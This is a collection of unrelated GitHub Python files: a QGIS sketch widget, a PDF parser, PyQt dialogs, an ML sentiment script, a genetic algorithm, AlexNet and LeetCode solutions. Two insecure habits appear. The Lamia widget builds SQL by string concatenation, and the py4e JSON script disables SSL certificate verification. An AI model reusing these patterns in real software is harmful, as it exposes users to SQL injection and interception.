\",\"\n sql += \"id_photo = \" + str(lastidcroquis) + \",\"\n sql += \"id_revisionbegin = \" + str(lastrevision) + \",\"\n sql += \"typephoto = 'CRO' \"\n sql += \" WHERE pk_photo = \" + str(pkcroquis) + \";\"\n query = self.dbase.query(sql)\n self.dbase.commit()\n\n sql = \"UPDATE Ressource SET file = '\" + fileimage + \"', dateressource = '\" + datecreation + \"'\"\n sql += \" WHERE pk_ressource = \" + str( lastressourcepk) + \";\"\n query = self.dbase.query(sql)\n self.dbase.commit()\n\n\n\n if self.parentWidget is not None and self.parentWidget.currentFeature is not None:\n currentparentlinkfield = self.parentWidget.currentFeature['id_objet']\n sql = \"INSERT INTO Tcobjetressource(id_tcobjet, id_tcressource,id_revisionbegin) \"\n sql += \" VALUES(\" + str(currentparentlinkfield) + \", \" + str(lastressourceid) + \",\" + str(lastrevision) + \");\"\n query = self.dbase.query(sql)\n self.dbase.commit()\n \"\"\"\n\n def widgetClicked(self, **kwargs):\n super().widgetClicked(**kwargs)\n if self.currentFeaturePK is None:\n self.photowdg.clear()\n\n def postSaveFeature(self, savedfeaturepk=None):\n\n if self.currentFeaturePK is None: # first creation\n idphoto, pkres = self.dbase.getValuesFromPk(\n self.DBASETABLENAME.lower() + \"_qgis\",\n [\"id_\" + self.DBASETABLENAME.lower(), \"pk_resource\"],\n savedfeaturepk,\n )\n datecreation = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n datetimecreation = str(\n datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n )\n\n # sql = \"UPDATE media SET mediatype = 'CRO' WHERE pk_photo = {}\".format(str(savedfeaturepk))\n # query = self.dbase.query(sql)\n\n fileimage = os.path.join(\n \".\",\n self.DBASETABLENAME,\n \"\".join(datecreation.split(\"-\")),\n str(idphoto) + \"_sketch.png\",\n )\n if not os.path.exists(\n os.path.dirname(self.dbase.completePathOfFile(fileimage))\n ):\n os.makedirs(os.path.dirname(self.dbase.completePathOfFile(fileimage)))\n\n sql = (\n \"UPDATE resource SET file = '\"\n + fileimage\n + \"', datetimeresource = '\"\n + datetimecreation\n + \"'\"\n )\n sql += \" WHERE pk_resource = \" + str(pkres)\n query = self.dbase.query(sql)\n\n else:\n fileimage = self.dbase.getValuesFromPk(\n self.DBASETABLENAME + \"_qgis\", \"file\", self.currentFeaturePK\n )\n\n 
self.editorwindow.saveImage(self.dbase.completePathOfFile(fileimage))\n\n\nclass UserUI(QWidget):\n def __init__(self, parent=None):\n super(UserUI, self).__init__(parent=parent)\n uipath = os.path.join(os.path.dirname(__file__), \"lamia_form_media_ui.ui\")\n uic.loadUi(uipath, self)\n\n\nclass ScribbleMainWindow(QMainWindow):\n def __init__(self, parentwdg=None, parent=None):\n super(ScribbleMainWindow, self).__init__(parent=parent)\n uipath = os.path.join(\n os.path.dirname(__file__), \"lamia_form_sketch_drawingwdg_ui.ui\"\n )\n uic.loadUi(uipath, self)\n self.parentwdg = parentwdg\n self.scribbleArea = ScribbleArea(parent=self)\n self.scribbleArea.clearImage()\n self.scribbleArea.mainWindow = self # maybe not using this?\n\n self.scrollArea.setWidget(self.scribbleArea)\n\n self.toolbar = self.addToolBar(\"Color\")\n self.colorwdg = qgis.gui.QgsColorButton()\n self.colorwdg.setColor(QtCore.Qt.black)\n self.toolbar.addWidget(self.colorwdg)\n self.spinb = QSpinBox()\n self.spinb.setValue(3)\n self.toolbar.addWidget(self.spinb)\n\n self.spinb.valueChanged.connect(self.scribbleArea.setPenWidth)\n self.colorwdg.colorChanged.connect(self.scribbleArea.setPenColor)\n\n self.clearAction = QAction(\"Clear\", self)\n self.clearAction.triggered.connect(self.scribbleArea.clearImage)\n self.toolbar.addAction(self.clearAction)\n\n self.reinitAction = QAction(\"reinit\", self)\n self.reinitAction.triggered.connect(self.scribbleArea.reinit)\n self.toolbar.addAction(self.reinitAction)\n\n def reinitSize(self):\n self.scribbleArea.reinitSize()\n\n def saveImage(self, file):\n self.scribbleArea.saveImage(file, \"png\")\n\n def clear(self):\n self.scribbleArea.clearImage()\n\n def openImage(self, file):\n self.scribbleArea.openImage(file)\n\n def setImage(self, qimage):\n self.scribbleArea.setImage(qimage)\n\n def closeEvent(self, event):\n self.parentwdg.photowdg.clear()\n self.parentwdg.photowdg.setPixmap(self.scribbleArea.image)\n event.accept()\n\n\nclass ScribbleArea(QWidget):\n \"\"\"\n this scales the image but it's not good, too many refreshes really mess it up!!!\n \"\"\"\n\n def __init__(self, larg=500, haut=500, parent=None):\n super(ScribbleArea, self).__init__(parent)\n # self.setAttribute(QtCore.Qt.WA_StaticContents)\n self.setFixedSize(larg, haut)\n self.modified = False\n self.scribbling = False\n self.myPenWidth = 3\n self.myPenColor = QtCore.Qt.black\n imageSize = QtCore.QSize(larg, haut)\n # self.image = QtGui.QImage()\n self.image = QtGui.QImage(imageSize, QtGui.QImage.Format_RGB32)\n self.lastPoint = QtCore.QPoint()\n\n self.currentfilename = None\n\n def openImage(self, fileName=None):\n loadedImage = QtGui.QImage()\n if not loadedImage.load(fileName):\n return False\n self.currentfilename = fileName\n return self.setImage(loadedImage)\n\n def reinit(self):\n if self.currentfilename is not None:\n self.openImage(self.currentfilename)\n\n def reinitSize(self):\n self.setFixedSize(500, 500)\n self.mainWindow.resize(500, 500)\n imageSize = QtCore.QSize(500, 500)\n self.image = QtGui.QImage(imageSize, QtGui.QImage.Format_RGB32)\n\n def setImage(self, loadedImage):\n w = loadedImage.width()\n h = loadedImage.height()\n self.setFixedSize(w, h)\n self.mainWindow.resize(w, h)\n\n # newSize = loadedImage.size().expandedTo(self.size())\n # self.resizeImage(loadedImage, newSize)\n self.image = loadedImage\n self.modified = False\n self.update()\n return True\n\n def saveImage(self, fileName, fileFormat):\n if self.image.save(fileName, fileFormat):\n self.modified = False\n return True\n else:\n 
return False\n\n def setPenColor(self, newColor):\n self.myPenColor = newColor\n\n def setPenWidth(self, newWidth):\n self.myPenWidth = newWidth\n\n def clearImage(self):\n self.image.fill(QtGui.qRgb(255, 255, 255))\n self.modified = True\n self.update()\n\n def mousePressEvent(self, event):\n # print \"self.image.width() = %d\" % self.image.width()\n # print \"self.image.height() = %d\" % self.image.height()\n # print \"self.image.size() = %s\" % self.image.size()\n # print \"self.size() = %s\" % self.size()\n # print \"event.pos() = %s\" % event.pos()\n if event.button() == QtCore.Qt.LeftButton:\n self.lastPoint = event.pos()\n self.scribbling = True\n\n def mouseMoveEvent(self, event):\n if (event.buttons() & QtCore.Qt.LeftButton) and self.scribbling:\n self.drawLineTo(event.pos())\n\n def mouseReleaseEvent(self, event):\n if event.button() == QtCore.Qt.LeftButton and self.scribbling:\n self.drawLineTo(event.pos())\n self.scribbling = False\n\n def paintEvent(self, event):\n painter = QtGui.QPainter(self)\n painter.drawImage(event.rect(), self.image, event.rect())\n\n def drawLineTo(self, endPoint):\n painter = QtGui.QPainter(self.image)\n painter.setPen(\n QtGui.QPen(\n self.myPenColor,\n self.myPenWidth,\n QtCore.Qt.SolidLine,\n QtCore.Qt.RoundCap,\n QtCore.Qt.RoundJoin,\n )\n )\n painter.drawLine(self.lastPoint, endPoint)\n self.modified = True\n\n # rad = self.myPenWidth / 2 + 2\n # self.update(QtCore.QRect(self.lastPoint, endPoint).normalized().adjusted(-rad, -rad, +rad, +rad))\n self.update()\n self.lastPoint = QtCore.QPoint(endPoint)\n\n def print_(self):\n # QPrinter/QPrintDialog live in QtPrintSupport under Qt5, not QtGui\n from qgis.PyQt import QtPrintSupport\n\n printer = QtPrintSupport.QPrinter(QtPrintSupport.QPrinter.HighResolution)\n\n printDialog = QtPrintSupport.QPrintDialog(printer, self)\n if printDialog.exec_() == QDialog.Accepted:\n painter = QtGui.QPainter(printer)\n rect = painter.viewport()\n size = self.image.size()\n size.scale(rect.size(), QtCore.Qt.KeepAspectRatio)\n painter.setViewport(rect.x(), rect.y(), size.width(), size.height())\n painter.setWindow(self.image.rect())\n painter.drawImage(0, 0, self.image)\n painter.end()\n\n def isModified(self):\n return self.modified\n\n def penColor(self):\n return self.myPenColor\n\n def penWidth(self):\n return self.myPenWidth\n","repo_name":"Artelia/Lamia","sub_path":"config/base3/qgswidgets/lamia_form_sketch.py","file_name":"lamia_form_sketch.py","file_ext":"py","file_size_in_byte":19056,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"7"}
+{"seq_id":"25863504416","text":"from pdfminer.pdfdocument import PDFDocument\r\nfrom pdfminer.pdfpage import PDFPage\r\nfrom pdfminer.pdfparser import PDFParser\r\nfrom pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter\r\nfrom pdfminer.converter import PDFPageAggregator\r\nfrom pdfminer.layout import LAParams, LTTextBox, LTTextLine, LTFigure\r\nimport os\r\nimport json\r\nfrom multiprocessing import Pool\r\n\r\ndef parse_text(layout):\r\n \"\"\"Function to recursively parse the layout tree.\"\"\"\r\n result = []\r\n if not hasattr(layout, '__iter__'):\r\n return result\r\n for lt_obj in layout:\r\n if isinstance(lt_obj, LTTextLine):\r\n bbox = lt_obj.bbox\r\n text = lt_obj.get_text().strip()\r\n if text != '':\r\n result += [(bbox, text)]\r\n else:\r\n result += parse_text(lt_obj)\r\n return result\r\n\r\n\r\ndef parse_case(case_path):\r\n \"\"\"Parse all the pdf files in the folder.\"\"\"\r\n try:\r\n result = {\r\n 'id': case_path.split('/')[-2], \r\n 'docs': {}\r\n }\r\n\r\n for name in os.listdir(case_path):\r\n if name[0] == '.' or name[-4:] != '.pdf':\r\n continue\r\n doc_id = name.split('.')[0]\r\n result['docs'][doc_id] = {'pages': {}}\r\n doc_obj = result['docs'][doc_id]\r\n\r\n path = case_path + name\r\n fp = open(path, 'rb')\r\n parser = PDFParser(fp)\r\n doc = PDFDocument(parser)\r\n rsrcmgr = PDFResourceManager()\r\n laparams = LAParams(detect_vertical=True, all_texts=True)\r\n device = PDFPageAggregator(rsrcmgr, laparams=laparams)\r\n interpreter = PDFPageInterpreter(rsrcmgr, device)\r\n\r\n for page in PDFPage.create_pages(doc):\r\n interpreter.process_page(page)\r\n layout = device.get_result()\r\n doc_obj['pages'][layout.pageid] = {\r\n 'size': (layout.width, layout.height),\r\n 'text': parse_text(layout)\r\n }\r\n # print(layout.width, layout.height)\r\n\r\n output = open(case_path + 'parsed.json', 'w')\r\n json.dump(result, output, indent=None)\r\n except:\r\n print(\"Error \" + case_path)\r\n\r\n return None\r\n\r\n\r\n\r\ndef main(base_path):\r\n case_list = []\r\n for direc in os.listdir(base_path):\r\n path = base_path + direc + '/'\r\n if not os.path.isdir(path):\r\n continue\r\n case_list.append(path)\r\n # Multiprocessing, for speed up\r\n pool = Pool(processes=8)\r\n output = pool.map(parse_case, case_list)\r\n\r\n\r\nif __name__ == '__main__':\r\n main('Content/')\r\n","repo_name":"thomas0809/GraphIE","sub_path":"sentence-level/scripts-for-visual-ie/parse_pdf.py","file_name":"parse_pdf.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"7"}
+{"seq_id":"31404847930","text":"from PyQt5.QtCore import QObject, pyqtSignal, pyqtSlot\nfrom PyQt5.QtWidgets import QDialog\nfrom ..view.Ui_progress import Ui_progressDialog\n\n\nclass ProgressDialog(QDialog, Ui_progressDialog):\n def __init__(self, parent=None):\n super(ProgressDialog, self).__init__(parent)\n self.setupUi(self)\n self.setWindowTitle('下载')\n self.listWidget.itemClicked.connect(self.item_clicked)\n\n # 下载切换\n def item_clicked(self, item):\n # 获取当前选中的item\n item = self.listWidget.selectedItems()[0]\n if item.text() == '正在下载':\n self.stackedWidget.setCurrentIndex(1)\n if item.text() == '已完成':\n self.stackedWidget.setCurrentIndex(0)\n\n\nif __name__ == '__main__':\n import sys\n from PyQt5.QtWidgets import QApplication\n\n app = QApplication(sys.argv)\n progressDialog = ProgressDialog()\n progressDialog.show()\n sys.exit(app.exec_())\n","repo_name":"jlx001/title_","sub_path":"app/function/progress.py","file_name":"progress.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"37626403816","text":"import numpy as np\nimport pandas as pd\nimport pymorphy2\nfrom nltk import RegexpTokenizer\nimport pickle\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import metrics\nfrom sklearn.metrics import accuracy_score\n\nall_feeds_file = \"all_train.csv\"\nmy_feeds_file = \"my.csv\"\n\nmorph = pymorphy2.MorphAnalyzer()\n\nall_feeds = pd.read_csv(\n all_feeds_file,\n encoding=\"utf-8\",\n usecols=[\"text\"]\n).values\n\nall_labels = pd.read_csv(\n all_feeds_file,\n encoding=\"utf-8\",\n usecols=[\"label\"]\n).values\n\nmy_feeds = pd.read_csv(\n my_feeds_file,\n encoding=\"utf-8\",\n usecols=[\"text\"]\n).values\n\nmy_labels = pd.read_csv(\n my_feeds_file,\n encoding=\"utf-8\",\n usecols=[\"label\"]\n).values\n\nY_train = []\nfor label in all_labels:\n Y_train.append(int(label[0]))\n\ny_true = []\nfor label in my_labels:\n y_true.append(int(label[0]))\n\n\ndef get_normal_form(one_word):\n return morph.parse(one_word)[0].normal_form\n\n\ntokenizer = RegexpTokenizer(r'\\w+')\n\n\n# массив всех слов в нормальной форме\ndef get_normal_form_words(feeds):\n normal_form_words = []\n for feed in feeds:\n words = tokenizer.tokenize(feed[0].lower())\n normal_form_words += list(map(get_normal_form, words))\n\n return normal_form_words\n\n\n# количество уникальных слов в массиве\ndef get_count_of_unique_words(words_array):\n return len(np.unique(words_array))\n\n\n# мешок слов\ndef get_words_bag(feeds, all_unique):\n bag = []\n for feed in feeds:\n feed_all_words = get_normal_form_words([feed])\n feed_bag = []\n for word in all_unique:\n count = feed_all_words.count(word)\n feed_bag.append(count)\n\n bag.append(feed_bag)\n\n return bag\n\n\ndef save_array_to_file(array, text):\n with open(text, 'wb') as f:\n pickle.dump(array, f)\n\n\ndef read_array_from_file(text):\n with open(text, 'rb') as f:\n return pickle.load(f)\n\n\nall_unique_words = np.unique(get_normal_form_words(all_feeds))\n\n# words_bag = get_words_bag(all_feeds, all_unique_words)\n# my_words_bag = get_words_bag(my_feeds, all_unique_words)\n\n# save_array_to_file(words_bag, \"all_bag.txt\")\n# save_array_to_file(my_words_bag, \"my_bag.txt\")\n\nwords_bag = read_array_from_file(\"all_bag.txt\")\nmy_words_bag = read_array_from_file(\"my_bag.txt\")\n\nreg_model = LogisticRegression(max_iter=100000)\nreg_model.fit(words_bag, Y_train)\n\ny_pred = reg_model.predict(my_words_bag)\n\n# метрики\nprint(accuracy_score(y_true, y_pred))\nprint(metrics.classification_report(y_true, y_pred, digits=3))\n\npositive_weights = dict(zip(all_unique_words, reg_model.coef_[2]))\nneutral_weights = dict(zip(all_unique_words, reg_model.coef_[1]))\nnegative_weights = dict(zip(all_unique_words, reg_model.coef_[0]))\n\n\ndef get_first_last_words(dict_weights):\n sorted_list = list({k: v for k, v in sorted(dict_weights.items(), key=lambda item: item[1], reverse=True)})\n first_10 = sorted_list[0:10]\n reversed_sorted_list = sorted_list[::-1]\n last_10 = reversed_sorted_list[0:10]\n print(first_10, last_10)\n\n\n# первые 10 и последние 10 слов для каждого класса\nget_first_last_words(positive_weights)\nget_first_last_words(negative_weights)\nget_first_last_words(negative_weights)\n","repo_name":"iapolya/NLP_ITIS_3","sub_path":"FilmReviews/regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"22442279033","text":"\"\"\"\n Son una secuencia de números enteros los cuales siguen una regla sencilla:\n\nel primer elemento de la secuencia es igual a uno (Fib1 = 1)\nel segundo elemento también es igual a uno (Fib2 = 1)\ncada número después de ellos son la suman de los dos números anteriores (Fibi = Fibi-1 + Fibi-2)\nAquí están algunos de los primeros números en la serie Fibonacci:\n\nfib_1 = 1 fib_2 = 1 fib_3 = 1 + 1 = 2 fib_4 = 1 + 2 = 3 fib_5 = 2 + 3 = 5 fib_6 = 3 + 5 = 8 fib_7 = 5 + 8 = 13\n \"\"\"\n \ndef fib(n):\n if n < 1:\n return None\n if n < 3:\n return 1\n\n elem_1 = elem_2 = 1\n the_sum = 0\n for i in range(3, n + 1):\n the_sum = elem_1 + elem_2\n elem_1, elem_2 = elem_2, the_sum\n return the_sum\n\n\nfor n in range(1, 10): # probando\n print(n, \"->\", fib(n))\n\ndef factorial_function(n):\n if n < 0:\n return None\n if n < 2:\n return 1\n return n * factorial_function(n - 1)","repo_name":"Betelgeusep/python_apuntes","sub_path":"funciones/ejemplos_funciones/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"3932746951","text":"import urllib.request \r\nimport json\r\nimport ssl\r\n##The program will prompt for a URL, read the JSON data from that URL using\r\n##urllib and then parse and extract the comment counts from the JSON data,\r\n##compute the sum of the numbers in the file and enter the sum below:\r\n##Sample data: http://py4e-data.dr-chuck.net/comments_42.json (Sum=2553)\r\n##Actual data: http://py4e-data.dr-chuck.net/comments_792632.json (Sum ends with 12)\r\n\r\n# Ignore SSL certificate errors\r\nctx = ssl.create_default_context()\r\nctx.check_hostname = False\r\nctx.verify_mode = ssl.CERT_NONE\r\n\r\nurl = input('Enter - ')\r\nprint('Retriving...')\r\nconnection = urllib.request.urlopen(url)\r\ndata=connection.read().decode()\r\njs= json.loads(data)\r\n\r\n\r\n\r\ncount = 0\r\n\r\nfor item in js['comments']:\r\n count = count + int(item['count'])\r\n\r\nprint('count:', count)\r\n","repo_name":"mahta-khoobi/PythonSpecialization_Coursera","sub_path":"3- Accessing Web Data/5- JSON.py","file_name":"5- JSON.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"39563042272","text":"from django.core.management.base import BaseCommand\nfrom counselor.models import *\n\nimport requests\n\nfrom ecocloud.tools import load_csv\n\nCONTINENTS = [\"asia\", \"north america\", \"europe\", \"south america\", \"africa\"]\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n load_csv()\n\n regions = requests.get(\"https://api.aiven.io/v1/clouds\").json()\n\n for region in regions[\"clouds\"]:\n region_object = Region.objects.filter(name=region[\"cloud_name\"])\n if not region_object.exists():\n if \"do\" not in region[\"cloud_name\"] and \"upcloud\" not in region[\"cloud_name\"]:\n country = region[\"cloud_description\"].lower().split(',')[0]\n if country in CONTINENTS:\n country = region[\"cloud_description\"].lower().split(',')[1][1:].split('-')[0][:-1]\n Region.objects.create(name=region[\"cloud_name\"], continent=region[\"geo_region\"], country=country)\n\n services = requests.get(\"https://api.aiven.io/v1/service_types\").json()\n\n for service_name in services[\"service_types\"]:\n service_object = Service.objects.create(name=service_name)\n for service_plan in services[\"service_types\"][service_name][\"service_plans\"]:\n service_plan_name = service_plan[\"service_plan\"]\n for region_name in service_plan[\"regions\"]:\n region = Region.objects.filter(name=region_name).first()\n ServiceRegionRelation.objects.create(\n region=region, service=service_object,\n service_plan=service_plan_name,\n price=float(service_plan[\"regions\"][region_name][\"price_usd\"]) * 730\n )\n","repo_name":"sepehrjavid/ecocloud","sub_path":"counselor/management/commands/fetchdata.py","file_name":"fetchdata.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"34661219357","text":"from random import randint, random\nfrom package.sga.organism import Organism\nfrom package.constants import CROSSOVER_OPERATOR, CROSSOVER_RATE, ELITISM_AMOUNT, GENERATION_THRESHOLD, ITEMS, MUTATION_RATE, POPULATION_SIZE, SELECTION_OPERATOR, TOURNAMENT_K, AsBit, Bit\n\n\nclass Population:\n generation_number: int\n organisms: list[Organism] # always sorted in order of fitness\n best_organism_ever: Organism # always updated\n\n def __init__(self):\n self.generation_number = 0\n self.organisms = [Population.gen_random_org()\n for _ in range(POPULATION_SIZE)]\n self.organisms.sort()\n self.best_organism_ever = self.get_best_organism()\n\n def perform_generation(self) -> None:\n self.generation_number += 1\n\n mutated_children: list[Organism] = []\n\n elites = self.__get_elites()\n for elite in elites:\n mutated_children.append(elite)\n\n parents: list[Organism] = self.__select_parents()\n while len(mutated_children) < POPULATION_SIZE:\n parent1 = parents[randint(1, len(parents)) - 1]\n parent2 = parents[randint(1, len(parents)) - 1]\n if random() < CROSSOVER_RATE:\n child1, child2 = Population.__crossover(parent1, parent2)\n mutated_children.append(child1)\n mutated_children.append(child2)\n else:\n mutated_children.append(parent1)\n mutated_children.append(parent2)\n\n for child in mutated_children:\n if random() < MUTATION_RATE:\n child.mutate()\n\n self.organisms = mutated_children\n self.organisms.sort()\n\n if self.get_best_organism().get_total_value() > self.best_organism_ever.get_total_value():\n self.best_organism_ever = self.get_best_organism()\n\n def is_finished(self):\n best_fitness = self.get_best_fitness()\n worst_fitness = self.get_worst_fitness()\n difference = abs(best_fitness - worst_fitness)\n less_than_1percent_difference = difference < .01 * \\\n min(abs(best_fitness), abs(worst_fitness))\n if GENERATION_THRESHOLD == -1:\n return less_than_1percent_difference\n return less_than_1percent_difference or self.generation_number >= GENERATION_THRESHOLD\n\n def get_best_organism(self) -> Organism:\n return self.organisms[-1]\n\n def get_best_fitness(self) -> int:\n return self.organisms[-1].fitness\n\n def get_worst_fitness(self) -> int:\n return self.organisms[0].fitness\n\n @staticmethod\n def __crossover(parent1: Organism, parent2: Organism) -> tuple[Organism, Organism]:\n def uniform(parent1: Organism, parent2: Organism):\n mask = Population.__gen_random_bitstring(len(parent1.chromosome))\n return crossover_from_mask(parent1, parent2, mask)\n\n def single_point(parent1: Organism, parent2: Organism):\n point = randint(1, len(parent1.chromosome)-1)\n mask = [0 if i < point else 1 for i in range(\n len(parent1.chromosome))]\n return crossover_from_mask(parent1, parent2, mask) # type:ignore\n\n def double_point(parent1: Organism, parent2: Organism):\n point1, point2 = sorted(\n [randint(1, len(parent1.chromosome)-1) for _ in range(2)])\n mask = [1 if i >= point1 and i <\n point2 else 0 for i in range(len(parent1.chromosome))]\n return crossover_from_mask(parent1, parent2, mask) # type:ignore\n\n def crossover_from_mask(parent1: Organism, parent2: Organism, mask: list[Bit]) -> tuple[Organism, Organism]:\n chromosome1: list[Bit] = []\n chromosome2: list[Bit] = []\n for i in range(len(mask)):\n if mask[i] == 0:\n chromosome1.append(parent1.chromosome[i])\n chromosome2.append(parent2.chromosome[i])\n else:\n chromosome1.append(parent2.chromosome[i])\n chromosome2.append(parent1.chromosome[i])\n return Organism(chromosome1), Organism(chromosome2)\n\n 
crossover_operators = {'uniform': uniform,\n 'single point': single_point, 'double point': double_point}\n return crossover_operators[CROSSOVER_OPERATOR](parent1, parent2)\n\n def __get_elites(self) -> list[Organism]:\n elites: list[Organism] = []\n for i in range(1, ELITISM_AMOUNT+1):\n elites.append(self.organisms[-i])\n return elites\n\n def __select_parents(self) -> list[Organism]:\n def roulette(self: Population) -> list[Organism]:\n # add constant to all fitness values so they are all positive\n lowest_fitness = self.get_worst_fitness()\n shifter: int = 0\n if lowest_fitness <= 0:\n shifter = abs(lowest_fitness) + 1\n shifted_fitnesses = list(\n map(lambda x: x + shifter, [org.fitness for org in self.organisms]))\n total_fitness = sum(shifted_fitnesses)\n\n parents: list[Organism] = []\n for _ in range(POPULATION_SIZE - ELITISM_AMOUNT):\n spin = randint(1, total_fitness)\n for i in range(len(shifted_fitnesses)):\n spin -= shifted_fitnesses[i]\n if spin <= 0:\n parents.append(self.organisms[i])\n break\n return parents\n\n def tournament(self: Population) -> list[Organism]:\n parents: list[Organism] = []\n for _ in range(POPULATION_SIZE - ELITISM_AMOUNT):\n fighter1 = self.organisms[randint(1, len(self.organisms)) - 1]\n fighter2 = self.organisms[randint(1, len(self.organisms)) - 1]\n if random() < TOURNAMENT_K:\n parents.append(max(fighter1, fighter2))\n else:\n parents.append(min(fighter1, fighter2))\n return parents\n\n selection_operators = {\n 'roulette': roulette, 'tournament': tournament} # type: ignore\n return selection_operators[SELECTION_OPERATOR](self)\n\n @staticmethod\n def gen_random_org() -> Organism:\n return Organism(Population.__gen_random_bitstring(len(ITEMS)))\n\n @staticmethod\n def __gen_random_bitstring(length: int) -> list[Bit]:\n return [AsBit(randint(0, 1)) for _ in range(length)]\n","repo_name":"parkerbedlan/knapsack-evolutionary-computation","sub_path":"package/sga/population.py","file_name":"population.py","file_ext":"py","file_size_in_byte":6463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
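A note on the roulette selection in the record above: shifting every fitness so the minimum maps to 1 keeps all wheel slices positive even when raw fitnesses are negative. A minimal standalone sketch of that shift-and-spin step (function and variable names here are illustrative, not taken from the repo):

    from random import randint

    def roulette_pick(fitnesses):
        # shift so the worst candidate still gets a slice of width 1
        low = min(fitnesses)
        shift = abs(low) + 1 if low <= 0 else 0
        shifted = [f + shift for f in fitnesses]
        spin = randint(1, sum(shifted))
        for i, width in enumerate(shifted):
            spin -= width
            if spin <= 0:
                return i

    # roulette_pick([-5, 0, 10]) can return any index, but index 2 is most likely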
+{"seq_id":"7158199367","text":"\"\"\"\nDefines CNN architectures\n\"\"\"\n\nimport tensorflow as tf\nfrom tfutils import model_tool\n\ndef alexnet(images, train=True, norm=True, seed=0, **kwargs):\n \"\"\"\n Alexnet\n \"\"\"\n m = model_tool.ConvNet(seed=seed)\n\n conv_kwargs = {\"add_bn\": False, \"init\": \"xavier\", \"weight_decay\": 0.0001}\n pool_kwargs = {\"pool_type\": \"maxpool\"}\n fc_kwargs = {\"init\": \"trunc_norm\", \"weight_decay\": 0.0001, \"stddev\": 0.01}\n\n dropout = 0.5 if train else None\n\n m.conv(96, 11, 4, padding=\"VALID\", layer=\"conv1\",\n in_layer=images, **conv_kwargs)\n if norm:\n m.lrn(depth_radius=5, bias=1, alpha=0.0001, beta=0.75, layer=\"lrn1\")\n m.pool(3, 2, layer=\"pool1\", **pool_kwargs)\n\n m.conv(256, 5, 1, layer=\"conv2\", **conv_kwargs)\n if norm:\n m.lrn(depth_radius=5, bias=1, alpha=0.0001, beta=0.75, layer=\"lrn2\")\n m.pool(3, 2, layer=\"pool2\", **pool_kwargs)\n\n m.conv(384, 3, 1, layer=\"conv3\", **conv_kwargs)\n m.conv(384, 3, 1, layer=\"conv4\", **conv_kwargs)\n\n m.conv(256, 3, 1, layer=\"conv5\", **conv_kwargs)\n m.pool(3, 2, layer=\"pool5\", **pool_kwargs)\n\n m.fc(4096, dropout=dropout, bias=0.1, layer=\"fc6\", **fc_kwargs)\n m.fc(4096, dropout=dropout, bias=0.1, layer=\"fc7\", **fc_kwargs)\n m.fc(1000, activation=None, dropout=None, bias=0, layer=\"fc8\", **fc_kwargs)\n\n return m\n\n","repo_name":"dawnfinzi/CS431","sub_path":"alexnet/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"14196780885","text":"# from pudb import set_trace; set_trace()\nfrom typing import List\nimport math\n\n\nclass Solution1:\n def champagneTower(self, poured: int, query_row: int, query_glass: int) -> float:\n \"\"\"LeetCode 799\n\n Terrible performance. I solved this one two years ago, but couldn't\n solve it today. Granted, I was tight on time, but I was not on the\n right path. The way I was trying to simulate was not correct, because\n I tried to find out when the parent cup gets filled and analyze the\n filling situation per cup for child afterwards. This is vastly\n complicated. I had to see the solution, which uses another way to\n simulate. We keep track of the amount of fluid going through each cup.\n And since the amount spilled is deterministic based on the amount that\n goes through a cup, we can easily compute the amount the children will\n get.\n\n O(N^2), N is the number of glasses.\n \"\"\"\n glasses = [[0] * c for c in range(1, 102)]\n glasses[0][0] = poured\n for r in range(query_row + 1):\n for j, g in enumerate(glasses[r]):\n if g > 1:\n glasses[r + 1][j] += (g - 1) / 2\n glasses[r + 1][j + 1] += (g - 1) / 2\n glasses[r][j] = 1\n return glasses[query_row][query_glass]\n\n\nclass Solution2:\n def champagneTower(self, poured: int, query_row: int, query_glass: int) -> float:\n \"\"\"1D DP to save our face.\n\n 108 ms, 88% ranking\n \"\"\"\n glasses = [0] * 100\n glasses[0] = poured\n for r in range(query_row):\n temp = 0\n for j in range(r + 1):\n spill = max((glasses[j] - 1) / 2, 0)\n glasses[j] = spill + temp\n temp = spill\n glasses[r + 1] = temp\n return min(glasses[query_glass], 1.0)\n\n\n\nclass Solution3:\n def champagneTower(self, poured: int, query_row: int, query_glass: int) -> float:\n \"\"\"Smarter 1D DP\n \"\"\"\n glasses = [0] * (query_row + 1)\n glasses[0] = poured\n for r in range(1, query_row + 1):\n for j in range(r, -1, -1):\n glasses[j] = max((glasses[j] - 1) / 2, 0) + max((glasses[j - 1] - 1) / 2, 0)\n return min(glasses[query_glass], 1.0)\n\n\nsol = Solution3()\ntests = [\n (1, 1, 1, 0.0),\n (2, 1, 1, 0.5),\n (100000009, 33, 17, 1.0),\n (1, 1, 0, 0),\n]\n\nfor i, (poured, query_row, query_glass, ans) in enumerate(tests):\n res = sol.champagneTower(poured, query_row, query_glass)\n if math.isclose(res, ans):\n print(f'Test {i}: PASS')\n else:\n print(f'Test {i}; Fail. Ans: {ans}, Res: {res}')\n","repo_name":"FanchenBao/leetcode","sub_path":"2022_03_challenge/03_04_2022.py","file_name":"03_04_2022.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
